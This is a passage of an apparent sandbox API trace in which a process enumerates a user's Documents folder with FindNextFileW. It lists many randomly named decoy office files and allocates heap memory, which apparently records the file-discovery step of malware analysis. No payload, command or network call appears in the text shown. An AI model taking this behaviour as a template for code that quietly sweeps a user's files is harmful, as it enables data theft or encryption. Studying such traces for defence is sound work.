ftLastAccessTime.dwHighDateTime=0x1d5c0c1, ftLastWriteTime.dwLowDateTime=0x89d90520, ftLastWriteTime.dwHighDateTime=0x1d5c0c1, nFileSizeHigh=0x0, nFileSizeLow=0x1838a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="cb35uL18.ppt", cAlternateFileName="")) returned 1 [0094.264] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5d69e0e0, ftCreationTime.dwHighDateTime=0x1d5b9a5, ftLastAccessTime.dwLowDateTime=0xe59623d0, ftLastAccessTime.dwHighDateTime=0x1d5b701, ftLastWriteTime.dwLowDateTime=0xe59623d0, ftLastWriteTime.dwHighDateTime=0x1d5b701, nFileSizeHigh=0x0, nFileSizeLow=0x8d81, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="CY9Mwns8bf9aS7r7v.xls", cAlternateFileName="CY9MWN~1.XLS")) returned 1 [0094.264] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8ce14870, ftCreationTime.dwHighDateTime=0x1d5be16, ftLastAccessTime.dwLowDateTime=0x9fc8eba0, ftLastAccessTime.dwHighDateTime=0x1d5bd17, ftLastWriteTime.dwLowDateTime=0x9fc8eba0, ftLastWriteTime.dwHighDateTime=0x1d5bd17, nFileSizeHigh=0x0, nFileSizeLow=0xe7e9, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="c_UXE8e7CHr2aXm.csv", cAlternateFileName="C_UXE8~1.CSV")) returned 1 [0094.264] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6d583e10, ftCreationTime.dwHighDateTime=0x1d55e4d, ftLastAccessTime.dwLowDateTime=0x26fb5e20, ftLastAccessTime.dwHighDateTime=0x1d57ccf, ftLastWriteTime.dwLowDateTime=0x26fb5e20, ftLastWriteTime.dwHighDateTime=0x1d57ccf, nFileSizeHigh=0x0, nFileSizeLow=0x3b49, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="D68-UMcj xt ZPs.pptx", cAlternateFileName="D68-UM~1.PPT")) returned 1 [0094.264] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d207440, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x192, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0094.264] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3ea819a0, ftCreationTime.dwHighDateTime=0x1d5ba7d, ftLastAccessTime.dwLowDateTime=0x635f90d0, ftLastAccessTime.dwHighDateTime=0x1d5b7a2, ftLastWriteTime.dwLowDateTime=0x635f90d0, ftLastWriteTime.dwHighDateTime=0x1d5b7a2, nFileSizeHigh=0x0, nFileSizeLow=0x1569c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="dKkQF0XTG.odp", cAlternateFileName="DKKQF0~1.ODP")) returned 1 [0094.264] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4f28ac20, ftCreationTime.dwHighDateTime=0x1d5b642, ftLastAccessTime.dwLowDateTime=0x349c67a0, ftLastAccessTime.dwHighDateTime=0x1d5bf72, ftLastWriteTime.dwLowDateTime=0x349c67a0, ftLastWriteTime.dwHighDateTime=0x1d5bf72, nFileSizeHigh=0x0, nFileSizeLow=0x1539, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="eX G.odp", cAlternateFileName="EXG~1.ODP")) returned 1 [0094.264] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x60d01e50, ftCreationTime.dwHighDateTime=0x1d5c0a0, ftLastAccessTime.dwLowDateTime=0xa8c03400, ftLastAccessTime.dwHighDateTime=0x1d5c0c0, ftLastWriteTime.dwLowDateTime=0xa8c03400, ftLastWriteTime.dwHighDateTime=0x1d5c0c0, nFileSizeHigh=0x0, nFileSizeLow=0x14be8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="G9jMVN8XZJi.pdf", cAlternateFileName="G9JMVN~1.PDF")) returned 1 [0094.264] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5ffd2620, ftCreationTime.dwHighDateTime=0x1d53df7, ftLastAccessTime.dwLowDateTime=0x2c116c80, ftLastAccessTime.dwHighDateTime=0x1d56841, ftLastWriteTime.dwLowDateTime=0x2c116c80, ftLastWriteTime.dwHighDateTime=0x1d56841, nFileSizeHigh=0x0, nFileSizeLow=0x4c9f, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="gKkONhl _4JIuyPA7g.xlsx", cAlternateFileName="GKKONH~1.XLS")) returned 1 [0094.264] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd5a1de30, ftCreationTime.dwHighDateTime=0x1d5b9fc, ftLastAccessTime.dwLowDateTime=0x201f80b0, ftLastAccessTime.dwHighDateTime=0x1d5bd4b, ftLastWriteTime.dwLowDateTime=0x201f80b0, ftLastWriteTime.dwHighDateTime=0x1d5bd4b, nFileSizeHigh=0x0, nFileSizeLow=0x6a14, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="gqgz7 KyiyA9wCH9lS.odt", cAlternateFileName="GQGZ7K~1.ODT")) returned 1 [0094.264] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1de4c20, ftCreationTime.dwHighDateTime=0x1d5bc57, ftLastAccessTime.dwLowDateTime=0x9ac7360, ftLastAccessTime.dwHighDateTime=0x1d5c0e8, ftLastWriteTime.dwLowDateTime=0x9ac7360, ftLastWriteTime.dwHighDateTime=0x1d5c0e8, nFileSizeHigh=0x0, nFileSizeLow=0x1575c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="gUfYt.pptx", cAlternateFileName="GUFYT~1.PPT")) returned 1 [0094.264] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb8272960, ftCreationTime.dwHighDateTime=0x1d54877, ftLastAccessTime.dwLowDateTime=0x863f4110, ftLastAccessTime.dwHighDateTime=0x1d56291, ftLastWriteTime.dwLowDateTime=0x863f4110, ftLastWriteTime.dwHighDateTime=0x1d56291, nFileSizeHigh=0x0, nFileSizeLow=0xd90b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="iB9J6qmzlzOT0c.docx", cAlternateFileName="IB9J6Q~1.DOC")) returned 1 [0094.264] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f85dcf0, ftCreationTime.dwHighDateTime=0x1d5b68d, ftLastAccessTime.dwLowDateTime=0xae6f4a90, ftLastAccessTime.dwHighDateTime=0x1d5c38a, ftLastWriteTime.dwLowDateTime=0xae6f4a90, ftLastWriteTime.dwHighDateTime=0x1d5c38a, nFileSizeHigh=0x0, nFileSizeLow=0x1814a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="iiPNVu.xls", cAlternateFileName="")) returned 1 [0094.264] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4109bce0, ftCreationTime.dwHighDateTime=0x1d5c1bb, ftLastAccessTime.dwLowDateTime=0xf934f7e0, ftLastAccessTime.dwHighDateTime=0x1d5c53e, ftLastWriteTime.dwLowDateTime=0xf934f7e0, ftLastWriteTime.dwHighDateTime=0x1d5c53e, nFileSizeHigh=0x0, nFileSizeLow=0x800c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="IrCnDHvtRyHUHGtShK.ppt", cAlternateFileName="IRCNDH~1.PPT")) returned 1 [0094.264] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1273ac70, ftCreationTime.dwHighDateTime=0x1d5c4d0, ftLastAccessTime.dwLowDateTime=0x4bed5fb0, ftLastAccessTime.dwHighDateTime=0x1d5c1a5, ftLastWriteTime.dwLowDateTime=0x4bed5fb0, ftLastWriteTime.dwHighDateTime=0x1d5c1a5, nFileSizeHigh=0x0, nFileSizeLow=0x120a6, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="JamfXqUN_6vJZo.pps", cAlternateFileName="JAMFXQ~1.PPS")) returned 1 [0094.264] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb67d77e0, ftCreationTime.dwHighDateTime=0x1d5ba00, ftLastAccessTime.dwLowDateTime=0x2bab6360, ftLastAccessTime.dwHighDateTime=0x1d5b9b1, ftLastWriteTime.dwLowDateTime=0x2bab6360, ftLastWriteTime.dwHighDateTime=0x1d5b9b1, nFileSizeHigh=0x0, nFileSizeLow=0x95bc, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="JBBGBkI.csv", cAlternateFileName="")) returned 1 [0094.264] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd2cb8e70, ftCreationTime.dwHighDateTime=0x1d55dbf, ftLastAccessTime.dwLowDateTime=0xd60b84f0, ftLastAccessTime.dwHighDateTime=0x1d5714c, ftLastWriteTime.dwLowDateTime=0xd60b84f0, ftLastWriteTime.dwHighDateTime=0x1d5714c, nFileSizeHigh=0x0, nFileSizeLow=0x250b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="KdLjJC 8d4JUT.docx", cAlternateFileName="KDLJJC~1.DOC")) returned 1 [0094.265] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8eb9d910, ftCreationTime.dwHighDateTime=0x1d567df, ftLastAccessTime.dwLowDateTime=0xcb74b030, ftLastAccessTime.dwHighDateTime=0x1d5bc2d, ftLastWriteTime.dwLowDateTime=0xcb74b030, ftLastWriteTime.dwHighDateTime=0x1d5bc2d, nFileSizeHigh=0x0, nFileSizeLow=0x5e75, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MeuD nPJ7M67.docx", cAlternateFileName="MEUDNP~1.DOC")) returned 1 [0094.265] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x290dda00, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x290dda00, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x290dda00, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Music", cAlternateFileName="MYMUSI~1")) returned 1 [0094.265] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x332db28 [0094.265] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x332dab0 [0094.265] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xfc) returned 0x32b14c8 [0094.265] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce0d0 [0094.265] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce138 [0094.265] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce208 [0094.265] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x6932f0 [0094.265] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x332dba0 [0094.265] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce7b8 [0094.265] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x290dda00, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x290dda00, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x290dda00, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Pictures", cAlternateFileName="MYPICT~1")) returned 1 [0094.265] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x332db28 [0094.265] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x332dab0 [0094.265] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x332dc18 [0094.265] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x9e9e4460, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x9ebad4e0, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x9ebad4e0, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Shapes", cAlternateFileName="MYSHAP~1")) returned 1 [0094.265] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x332db28 [0094.265] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x332dab0 [0094.265] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x332dc90 [0094.265] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x290dda00, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x290dda00, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x290dda00, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Videos", cAlternateFileName="MYVIDE~1")) returned 1 [0094.265] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x332db28 [0094.266] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x332dab0 [0094.266] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x16c) returned 0x9b94968 [0094.266] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce2d8 [0094.266] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce270 [0094.266] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce1a0 [0094.266] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x6931e0 [0094.266] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x332dd08 [0094.266] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce4e0 [0094.266] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x332dd80 [0094.266] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x332ddf8 [0094.266] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x332de70 [0094.266] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xda9b9830, ftCreationTime.dwHighDateTime=0x1d5b7c8, ftLastAccessTime.dwLowDateTime=0xffb07ee0, ftLastAccessTime.dwHighDateTime=0x1d5bb12, ftLastWriteTime.dwLowDateTime=0xffb07ee0, ftLastWriteTime.dwHighDateTime=0x1d5bb12, nFileSizeHigh=0x0, nFileSizeLow=0x11bde, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="nnD-74w.doc", cAlternateFileName="")) returned 1 [0094.266] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x918af0b0, ftCreationTime.dwHighDateTime=0x1d593a0, ftLastAccessTime.dwLowDateTime=0xb0b5c190, ftLastAccessTime.dwHighDateTime=0x1d5c2ad, ftLastWriteTime.dwLowDateTime=0xb0b5c190, ftLastWriteTime.dwHighDateTime=0x1d5c2ad, nFileSizeHigh=0x0, nFileSizeLow=0x11a23, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NY_oA qfnaFrBV.docx", cAlternateFileName="NY_OAQ~1.DOC")) returned 1 [0094.266] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4dc5cd30, ftCreationTime.dwHighDateTime=0x1d5ba26, ftLastAccessTime.dwLowDateTime=0x6961cf10, ftLastAccessTime.dwHighDateTime=0x1d5c180, ftLastWriteTime.dwLowDateTime=0x6961cf10, ftLastWriteTime.dwHighDateTime=0x1d5c180, nFileSizeHigh=0x0, nFileSizeLow=0xfe20, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="o1A33chNmPJo_UuE.doc", cAlternateFileName="O1A33C~1.DOC")) returned 1 [0094.266] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a7a9f80, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x5c4f8e60, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x5c4f8e60, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Outlook Files", cAlternateFileName="OUTLOO~1")) returned 1 [0094.266] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x332db28 [0094.266] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x332dab0 [0094.266] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x332dc18 [0094.266] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xec78b280, ftCreationTime.dwHighDateTime=0x1d5bec7, ftLastAccessTime.dwLowDateTime=0xd26a4210, ftLastAccessTime.dwHighDateTime=0x1d5b647, ftLastWriteTime.dwLowDateTime=0xd26a4210, ftLastWriteTime.dwHighDateTime=0x1d5b647, nFileSizeHigh=0x0, nFileSizeLow=0xecc, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="P3UG-u5cYJO8Spn.rtf", cAlternateFileName="P3UG-U~1.RTF")) returned 1 [0094.266] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x788010, ftCreationTime.dwHighDateTime=0x1d5608d, ftLastAccessTime.dwLowDateTime=0xe84b8ed0, ftLastAccessTime.dwHighDateTime=0x1d56aad, ftLastWriteTime.dwLowDateTime=0xe84b8ed0, ftLastWriteTime.dwHighDateTime=0x1d56aad, nFileSizeHigh=0x0, nFileSizeLow=0xce2, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="PGbnRpgVWp-kAm_f2.xlsx", cAlternateFileName="PGBNRP~1.XLS")) returned 1 [0094.267] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe03b16a0, ftCreationTime.dwHighDateTime=0x1d5a6c3, ftLastAccessTime.dwLowDateTime=0xa5b73f30, ftLastAccessTime.dwHighDateTime=0x1d59b70, ftLastWriteTime.dwLowDateTime=0xa5b73f30, ftLastWriteTime.dwHighDateTime=0x1d59b70, nFileSizeHigh=0x0, nFileSizeLow=0x6f3b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="PPuq-6TBJx4FV5.docx", cAlternateFileName="PPUQ-6~1.DOC")) returned 1 [0094.267] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x83c25230, ftCreationTime.dwHighDateTime=0x1d5c220, ftLastAccessTime.dwLowDateTime=0x479e9700, ftLastAccessTime.dwHighDateTime=0x1d5b839, ftLastWriteTime.dwLowDateTime=0x479e9700, ftLastWriteTime.dwHighDateTime=0x1d5b839, nFileSizeHigh=0x0, nFileSizeLow=0x7bea, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="PXJqZm5D98Ur_npQ.odt", cAlternateFileName="PXJQZM~1.ODT")) returned 1 [0094.267] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4674ad80, ftCreationTime.dwHighDateTime=0x1d56238, ftLastAccessTime.dwLowDateTime=0xf4026ec0, ftLastAccessTime.dwHighDateTime=0x1d5b557, ftLastWriteTime.dwLowDateTime=0xf4026ec0, ftLastWriteTime.dwHighDateTime=0x1d5b557, nFileSizeHigh=0x0, nFileSizeLow=0x14882, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="qkllquzP-m.xlsx", cAlternateFileName="QKLLQU~1.XLS")) returned 1 [0094.267] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd1086fd0, ftCreationTime.dwHighDateTime=0x1d5bc34, ftLastAccessTime.dwLowDateTime=0x59b26b0, ftLastAccessTime.dwHighDateTime=0x1d5c3a2, ftLastWriteTime.dwLowDateTime=0x59b26b0, ftLastWriteTime.dwHighDateTime=0x1d5c3a2, nFileSizeHigh=0x0, nFileSizeLow=0xd937, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="rDdD54.doc", cAlternateFileName="")) returned 1 [0094.267] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x68c39880, ftCreationTime.dwHighDateTime=0x1d5bbc8, ftLastAccessTime.dwLowDateTime=0xa91ccab0, ftLastAccessTime.dwHighDateTime=0x1d5bcd5, ftLastWriteTime.dwLowDateTime=0xa91ccab0, ftLastWriteTime.dwHighDateTime=0x1d5bcd5, nFileSizeHigh=0x0, nFileSizeLow=0x4652, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="rL1VA_HOPLxyaV y9I.csv", cAlternateFileName="RL1VA_~1.CSV")) returned 1 [0094.267] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x18fc2bf0, ftCreationTime.dwHighDateTime=0x1d5bd3a, ftLastAccessTime.dwLowDateTime=0xf488f4e0, ftLastAccessTime.dwHighDateTime=0x1d5b5fc, ftLastWriteTime.dwLowDateTime=0xf488f4e0, ftLastWriteTime.dwHighDateTime=0x1d5b5fc, nFileSizeHigh=0x0, nFileSizeLow=0xa694, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="suY5F BlZ0nU Aw4D.odp", cAlternateFileName="SUY5FB~1.ODP")) returned 1 [0094.267] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6a99b970, ftCreationTime.dwHighDateTime=0x1d5c35a, ftLastAccessTime.dwLowDateTime=0x22b77a80, ftLastAccessTime.dwHighDateTime=0x1d5c089, ftLastWriteTime.dwLowDateTime=0x22b77a80, ftLastWriteTime.dwHighDateTime=0x1d5c089, nFileSizeHigh=0x0, nFileSizeLow=0x71ac, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TBEA9Q3sVHj.odt", cAlternateFileName="TBEA9Q~1.ODT")) returned 1 [0094.267] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4c7d9690, ftCreationTime.dwHighDateTime=0x1d5c149, ftLastAccessTime.dwLowDateTime=0x752d6730, ftLastAccessTime.dwHighDateTime=0x1d5bfc5, ftLastWriteTime.dwLowDateTime=0x752d6730, ftLastWriteTime.dwHighDateTime=0x1d5bfc5, nFileSizeHigh=0x0, nFileSizeLow=0x18449, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="trReD 97LkQS3Hk3.odt", cAlternateFileName="TRRED9~1.ODT")) returned 1 [0094.267] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2b3fadd0, ftCreationTime.dwHighDateTime=0x1d5bc65, ftLastAccessTime.dwLowDateTime=0x36a1eb00, ftLastAccessTime.dwHighDateTime=0x1d5b924, ftLastWriteTime.dwLowDateTime=0x36a1eb00, ftLastWriteTime.dwHighDateTime=0x1d5b924, nFileSizeHigh=0x0, nFileSizeLow=0x1025d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="u-aMqijoSKbxYaw.doc", cAlternateFileName="U-AMQI~1.DOC")) returned 1 [0094.267] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x97037f60, ftCreationTime.dwHighDateTime=0x1d5b8c3, ftLastAccessTime.dwLowDateTime=0xba666c60, ftLastAccessTime.dwHighDateTime=0x1d5b693, ftLastWriteTime.dwLowDateTime=0xba666c60, ftLastWriteTime.dwHighDateTime=0x1d5b693, nFileSizeHigh=0x0, nFileSizeLow=0x61b4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="uaM-Oex8lfdXTvedwu.odp", cAlternateFileName="UAM-OE~1.ODP")) returned 1 [0094.267] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb209ea20, ftCreationTime.dwHighDateTime=0x1d5a1e3, ftLastAccessTime.dwLowDateTime=0xca87b610, ftLastAccessTime.dwHighDateTime=0x1d5519b, ftLastWriteTime.dwLowDateTime=0xca87b610, ftLastWriteTime.dwHighDateTime=0x1d5519b, nFileSizeHigh=0x0, nFileSizeLow=0x18006, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="utAOwW3nILc4ZQ3W8.pptx", cAlternateFileName="UTAOWW~1.PPT")) returned 1 [0094.267] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xddf56b40, ftCreationTime.dwHighDateTime=0x1d5b6fc, ftLastAccessTime.dwLowDateTime=0x144b2120, ftLastAccessTime.dwHighDateTime=0x1d5b712, ftLastWriteTime.dwLowDateTime=0x144b2120, ftLastWriteTime.dwHighDateTime=0x1d5b712, nFileSizeHigh=0x0, nFileSizeLow=0xc4c, dwReserved0=0xa0000003, dwReserved1=0x0, 